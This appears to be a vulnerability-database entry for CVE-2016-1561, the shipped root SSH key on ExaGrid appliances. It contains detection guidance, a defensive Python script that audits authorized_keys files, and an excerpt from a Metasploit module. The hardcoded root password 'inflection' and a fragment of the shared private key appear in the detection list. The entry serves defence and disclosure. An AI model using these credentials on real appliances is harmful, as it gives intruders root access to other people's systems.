CVE-2016-1561
Published 2017-04-21
CVE-2016-1561: ExaGrid appliances with firmware before 4.8 P26 have a default SSH public key in the authorized_keys file for root, which allows remote attackers to obtain SSH…
Priority P273 · high · 7.5 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EXPLOIT
EPSS: 74.26% (99.4th percentile)
ExaGrid appliances with firmware before 4.8 P26 have a default SSH public key in the authorized_keys file for root, which allows remote attackers to obtain SSH access by leveraging knowledge of a private key from another installation or a firmware image.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| exagrid | ex10000e_firmware | — | — |
| exagrid | ex13000e_firmware | — | — |
| exagrid | ex21000e_firmware | — | — |
| exagrid | ex3000_firmware | — | — |
| exagrid | ex32000e_firmware | — | — |
| exagrid | ex40000e_firmware | — | — |
| exagrid | ex5000_firmware | — | — |
| exagrid | ex7000_firmware | — | — |
Detection & IOCs (extracted from sources)
- Detect SSH authentication attempts to port 22 using the known ExaGrid RSA private key (MIICWAIBAAKBgGdlD7qeGU9f8mdfmLmFemWMnz1tKeeuxKznWFI+6gkaagqjAF10...) as root; a successful auth with this key indicates exploitation of CVE-2016-1561.
- Alert on SSH login as 'root' with password 'inflection' to ExaGrid appliances on port 22; this is the hardcoded default credential used as a fallback when key-based auth fails.
- Monitor for interactive bash shell spawning (/bin/bash -i) immediately after SSH session establishment as root on ExaGrid appliances, which is the post-auth payload delivery mechanism.
- Audit the authorized_keys file for root on ExaGrid appliances for the presence of the known shipped public key; its presence on unpatched firmware (before 4.8 P26) indicates a backdoor condition.
- Exploitation requires knowledge of the private key, which is embedded in firmware images and the public Metasploit module; treat the key as fully public/compromised across all ExaGrid deployments.
- The module falls back to password authentication with 'inflection' if key-based auth fails, meaning both CVE-2016-1561 (key) and CVE-2016-1560 (password) attack vectors are attempted in sequence.
- Only ExaGrid appliances running firmware before version 4.8 P26 are vulnerable; patched appliances should have the shared key removed from root's authorized_keys.
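
The authorized_keys audit from the list above, as an added example (not code from ExaGrid, Rapid7 or this page): it computes the OpenSSH SHA256 fingerprint of every key entry, including entries that carry leading options, and reports those on a denylist. The key blobs, comments and denylist entry are constructed placeholders; in practice the denylist would hold the fingerprint of the shipped public key.

```python
import base64, binascii, hashlib, struct

def fingerprint(blob_b64):
    """OpenSSH-style SHA256 fingerprint of a base64 public-key blob."""
    raw = base64.b64decode(blob_b64, validate=True)
    digest = hashlib.sha256(raw).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def find_key(line):
    """Return (keytype, blob_b64, comment) for one authorized_keys line, or None.
    Leading options (from="...", command="...") are skipped by requiring that the
    blob's embedded, length-prefixed type string equals the key-type field."""
    fields = line.split()
    for i in range(len(fields) - 1):
        try:
            raw = base64.b64decode(fields[i + 1], validate=True)
        except (binascii.Error, ValueError):
            continue
        if len(raw) < 4:
            continue
        (n,) = struct.unpack(">I", raw[:4])
        if raw[4:4 + n] == fields[i].encode():
            return fields[i], fields[i + 1], " ".join(fields[i + 2:])
    return None

def audit(text, denylist):
    """Return [(line_no, keytype, comment)] for active keys on the denylist."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):      # commented-out entries are inactive
            continue
        key = find_key(line)
        if key and fingerprint(key[1]) in denylist:
            hits.append((no, key[0], key[2]))
    return hits

def _blob(keytype, body):
    """Constructed stand-in for a key blob: length-prefixed type + arbitrary bytes."""
    return base64.b64encode(struct.pack(">I", len(keytype)) + keytype + body).decode()

SHIPPED = _blob(b"ssh-rsa", b"constructed-stand-in-for-shipped-key")
ADMIN = _blob(b"ssh-ed25519", b"constructed-admin-key")
DENYLIST = {fingerprint(SHIPPED)}   # placeholder; use the shipped key's fingerprint
SAMPLE = "\n".join([                # constructed authorized_keys content
    "# constructed authorized_keys for root",
    f"ssh-ed25519 {ADMIN} admin@constructed-host",
    f'from="10.0.0.0/8",command="echo ssh-rsa x" ssh-rsa {SHIPPED} replication@constructed',
    f"# ssh-rsa {SHIPPED} disabled-entry",
])
```
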
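CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 7.5 | HIGH | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |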
No detection rules found.
Exploit-DB
ExaGrid - Known SSH Key and Default Password (Metasploit)
exploitdb·2016-04-07
CVE-2016-1561 ExaGrid - Known SSH Key and Default Password (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'net/ssh'
class MetasploitModule 'ExaGrid Known SSH Key and Default Password',
'Description' => %q{
ExaGrid ships a public/private key pair on their backup appliances to
allow passwordless authentication to other ExaGrid appliances. Since
the private key is easily retrievable, an attacker can use it to gain
unauthorized remote access as root. Additionally, this module will
attempt to use the default password for root, 'inflection'.
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Targets' => [ [ "Universal", {} ] ],
'Payload' =>
{
'Compat' => {
Metasploit
ExaGrid Known SSH Key and Default Password
metasploit
ExaGrid ships a public/private key pair on their backup appliances to allow passwordless authentication to other ExaGrid appliances. Since the private key is easily retrievable, an attacker can use it to gain unauthorized remote access as root. Additionally, this module will attempt to use the default password for root, 'inflection'.
No writeups or analysis indexed.
- http://packetstormsecurity.com/files/136634/ExaGrid-Known-SSH-Key-Default-Password.html
- http://www.rapid7.com/db/modules/exploit/linux/ssh/exagrid_known_privkey
- https://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials

Published: 2017-04-21